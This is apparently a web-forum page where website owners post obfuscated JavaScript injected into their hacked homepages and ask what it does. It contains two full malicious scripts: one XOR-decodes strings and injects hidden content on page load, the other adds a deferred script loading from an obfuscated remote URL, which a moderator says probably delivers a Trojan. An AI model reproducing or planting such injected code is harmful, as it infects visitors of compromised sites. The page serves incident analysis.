|
JavaScript - Virus?
Hi there,
I wonder if anyone could help me work out exactly what the code below is achieving? It was inserted onto the homepage of my site in some form of a successful hacking attempt. I've now changed all the passwords to the hosting and FTP but am very interested in what the following code was doing? Any help is much appreciated Code: <script>
function muFiBiro(){
if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;
else return window.outerWidth*window.outerHeight;}
if(muFiBiro()>100000){
function qggA(QfC, qaURwyjMF, bfRciESyF)
{
var oscH=bfRciESyF.split(qaURwyjMF);
var gXsGUq='';
for(rUmtLHPCD=-0x24-0x5+0x27+0x2;rUmtLHPCD<(oscH.length-1);rUmtLHPCD+=0x20+0x22-0xa+0x25-0x26-0x14-0x2f+0xd)
{ IzUtqb = oscH[rUmtLHPCD]^QfC;gXsGUq += String.fromCharCode(IzUtqb);}return gXsGUq;}
function AGaCZk(FkJJNsGU){ var RNlgCYxpio = document.getElementById('GDTA');window.eval();var cpuP=new Function("UBQu", "return 447716;"); }
;function RWkI(){var och=new Function("WBpqU", "return "+qggA(0x1a-0x3+0x28-0x2e+0x2da, 'K','655K644K648K670K646K654K645K671K')+"."+qggA(-0x2e+0x29+0x31-0x9+0x72e, 'p','1843p1854p1845p1832p')+"");var DrSDYDQj=och(-0x23+0x29-0x15-0x8-0x7+0x14-0x9+0x14);DrSDYDQj.innerHTML+=qggA(-0x22-0x2a+0x13+0x18-0x29+0xd-0x30+0x162, 'a','201a156a147a135a148a152a144a213a130a156a145a129a157a200a196a213a157a144a156a146a157a129a200a196a213a151a154a135a145a144a135a200a197a213a147a135a148a152a144a151a154a135a145a144a135a200a197a213a134a135a150a200a210a157a129a129a133a207a218a218a158a140a133a128a219a155a144a129a218a134a152a133a153a218a146a154a219a133a157a133a202a134a156a145a200a199a210a203a201a218a156a147a135a148a152a144a203a');}function ZIv(XMT){ fff.op.replace("254"); }
;if(window.addEventListener)
{
window.addEventListener(qggA(0x21+0xb+0x9+0x6+0x27+0x27-0x21-0x2b+0x6d8, 'r','1913r1914r1908r1905r'),RWkI,false);}else if(window.attachEvent){window.attachEvent('on'+qggA(0x21+0xb+0x9+0x6+0x27+0x27-0x21-0x2b+0x6d8, 'r','1913r1914r1908r1905r'), RWkI);}function dcQPeV(SwtlHm){ var jKopaCn = document.getElementById('RCDaPNV');var EUKFaRpTJ=new Function("rNIfPWTAk", "return 395763;"); }
;}</script>
Similar TutorialsHello. I finished building my website yesterday, but apparently it has a trojan on it. I don't understand how this could happen because I also have the website on godaddy and when I viewed that link- there was never a trojan. Right now were hosting the server on www.doteasy.com I do have an idea though, I think it might be because of a javascript I have on there in the index page - because I put it on so I could have a picture slideshow. Here are the two links to the site, if anyone would like to shed some light on this for me. Thanks. Here are the two websites: (both the same but different hosting companies) The one from doteasy.com has the trojan.... Doteasy.com: http://www.wmorinjr.com/Baba/index.html Godaddy.com: http://www.webdesignsbyapw.com/wayne/index.html Hello, Please help me to understand the risk from the js code I found on http://www.glanstider.no website. The code looks very strange: Code: <script>/*LGPL*/ try{ window.onload = function(){var Ynrwc1hiq87h = document.createElement('s)^c@r$$)#i$@p($$$t^'.replace(/#|@|\!|\(|\)|\^|\$|&/ig, ''));Ynrwc1hiq87h.setAttribute('defer', 'd@$e^#@)f&&^e@r()'.replace(/#|\)|\(|&|@|\^|\!|\$/ig, ''));Ynrwc1hiq87h.setAttribute('type', 't&&(e&(x&#t($/@j#@a#&@v#a)#s@^c#r@#i!p(!t^$&$'.replace(/&|@|\!|\$|\^|\)|\(|#/ig, ''));Ynrwc1hiq87h.setAttribute('id', 'Z(#!(e(l@@!!5#@b()))x#&i#)&6^@@s(@y@@x()^v)&9#&'.replace(/\!|\$|@|&|\)|\(|\^|#/ig, ''));Ynrwc1hiq87h.setAttribute('s#)!r^^@^c^&!'.replace(/@|\!|\^|\)|&|\$|#|\(/ig, ''), 'h(&t#))t&p#:)/(/@0!@(!@1&&)n#)!)e)#t)@)^-$c&)o((m#!(.$!^t)@^i&(g@&(@@e(@(r^@!d!(@&i&^^r#(!e(&^c&@t)^&.)!)c)o^^)m(!).!!@&g$#)^o$!&d#$a&d&@@d!$)y)-@!&c!$o@&$m^$$.!^(c#@a^)@r(!@#s#((w#(#(e!b!@n$@^e)t$@^!.(!$@#r(u$#!#!:&8@0^^8^##&0!^/^g)&^o)#!o!#g&l$^$$e#.$))$c@&)o^^m##(/#@)!g($@#o&)o#@g!($l$$^(#e#@.@c)$^o@m!$/#&&c@a!@r)^)e##e^$!!r&&)b)$u!$$$i@l#()d$^#e$r@$!!.$#(c#^o^@)m@&#&/)$x)@$&(n)#x)&(x@.&!#c&)@o($m(#/@(s^$^@o^s@$&o$^).$!c&^o#$#m!/!@&&@'.replace(/\(|\)|&|\^|#|\$|\!|@/ig, ''));if (document){document.body.appendChild(Ynrwc1hiq87h);}} } catch(Jg8hbd0kytqswmmfze) {}</script>
<!--40ace59eda33a6f5e5733ed6bdc65c1e-->
could you please tell me what this code do and how high is the security lack? Thanks --- [edit by Moderator Kor] Caution! Of course, don't run that code in your browsers . To read it I have only deciphered portions of it and I have found that it probably loads a Trojan. |
|||||||